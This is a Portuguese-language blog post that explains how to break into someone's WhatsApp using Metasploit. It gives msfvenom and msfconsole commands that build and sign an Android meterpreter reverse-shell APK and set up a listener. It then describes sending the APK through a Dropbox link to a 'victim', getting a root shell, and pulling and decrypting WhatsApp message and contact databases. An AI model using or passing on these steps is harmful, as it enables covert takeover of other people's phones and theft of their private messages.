᥀🔥📱INVADINDO WHATSAPP COM METASPLOIT MÉTODO ATUALIZADO 2021᥀🔥📱

O Metasploit é uma ferramenta usada para investigar vulnerabilidades em plataformas, servidores e em sistemas operacionais, com ele é possível realizar testes de invasão (pentests) criando um ambiente de exploração de vulnerabilidades. Quando uma vulnerabilidade é descoberta pode-se desenvolver um exploit, aplicando técnicas de engenharia reversa ou programação. O exploit é executado e testado em vários cenários, provando a existência de vulnerabilidades.


Criando Payloads Metasploit

Eu diria que um dos recursos mais úteis do Metasploit é o módulo msfpayload. Várias cargas (payloads) úteis podem ser criadas com este módulo, que também nos permite um shell em quase todas as situações. Para cada um desses payloads, você pode entrar no msfconsole e selecionar exploit/multi/handler. Executei ‘set payload‘ para configurar as opções necessárias (LHOST, LPORT, etc.). Executei e esperei que a carga útil fosse executada. Para o exemplo abaixo, que é bastante autoexplicativo, LHOST deve ser preenchido com seu endereço IP (LAN IP se atacar dentro da rede, WAN IP se atacar através da internet) e LPORT deve ser a porta na qual você deseja estar conectado.

Listando payloads


msfvenom -l



Neste post usei o android/meterpreter/reverse_tcp:


ifconfig

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.20 R> /root/wam.apk

d2j-apk-sign /root/wam.apk

msfconsole

shell

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.25.20

exploit




Fiz upload do aplicativo (wam-signed.apk) para o Dropbox.

Em seguida, enviei o link para a vítima. Deixei a vítima instalar e uma sessão foi iniciada.



help meterpreter


Navegando no Dispositivo:

shell


ACESSO ROOT

su


Navegando nas Medias do Whatsapp



Naveguei no banco de dados do Whatsapp


Nos aparelhos Android os arquivos de mensagens do Whatsapp estão localizados na memória do aparelho ou no cartão de memória. Na memória do aparelho o arquivo de mensagens, msg.db e o arquivo contendo a lista de contatos, wa.db, ficam na pasta /data/data/com.whataapp/databases, e o acesso a eles só é possível se o aparelho estiver no modo root, isto é um motivo para não “rootear” o seu android. No caso em que o aparelho esteja configurado para armazenar mensagens no cartão de memória, os mesmos serão criptografados na pasta /sdcard/WhatsApp/Databases com o nome msgstore-yyyy-mm-dd.X.db.crypt, ou seja, criptografado; existem vários algoritmos usados na criptografia, como crypt, crypt5, crypt6, crypt7, crypt8, crypt12… Para decriptografar este banco de dados, no sistema operacional Windows, é só fazer download do “whatsapp-viewer” no github, pelo link https://github.com/andreas-mausch/whatsapp-viewer/releases/tag/v1.9 Abrir o aplicativo e no menu Arquivo e escolher o método de criptografia.



Resumindo: o banco de dados do Whatsapp versão de Android consiste em dois arquivos principais: wa.db contém todas as informações relacionadas aos contatos (id, número de telefone, status, etc.), enquanto que msgstore.db armazena as mensagens, incluindo anexos.


Estrutura do WhatsApp:

Assim como vários aplicativos o fazem, o WhatsApp armazena todas as suas informações em um banco de dados SQLite: a localização e a estrutura do banco de dados são diferentes de plataforma em plataforma. Vejamos no Andoid:


Backup Diário do Banco de Dados: /Media: /Storage/(emulated/0, sdcard0)/WhatsApp/

Cache: /Storage/(emulated/0, sdcard0)/Android/Data/com.whatsapp/cache/
Dalvik cache: /data/dalvik-cache/data@app@com.whatsapp-2.apk.classes.dex

Sistema de Arquivos: /data/app/com.whatsapp-2.apk

Arquivos Data: /data/data/com.whatsapp/


Extração dos arquivos do Whatsapp com acesso físico

A extração dos arquivos com acesso físico pode ser feita de diversas maneiras:
Conectando o aparelho a um PC;

Transportando o cartão de memória para um leitor de cartões;

Utilizando um gerenciador de arquivos no próprio dispositivo.

Após recuperar os arquivos é preciso copiá-los para um PC para poder recuperá-los.

Se o dispositivo for enraizado (root), você alcançará facilmente os bancos de dados simples (/data/data/com.whatsapp/databases/msgstore.db e wa.db).

Postar um comentário

Post a Comment (0)

Postagem Anterior Próxima Postagem